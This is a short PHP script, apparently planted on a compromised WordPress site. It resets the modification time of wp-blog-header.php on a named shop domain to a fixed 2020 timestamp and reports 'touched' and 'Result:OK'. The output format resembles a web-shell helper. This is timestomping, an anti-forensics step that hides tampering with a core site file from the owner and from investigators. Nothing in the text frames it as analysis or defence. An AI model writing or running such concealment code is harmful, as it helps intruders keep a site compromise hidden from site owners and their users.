<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";ob_start();if(touch('/home/admin/domains/shop.rst.ge/public_html/wp-blog-header.php', 1580938392, 1580938392)) echo "touched";$c = ob_get_clean();print("<textarea>$c</textarea>");echo "Result:OK"; echo "</body></html>";  die;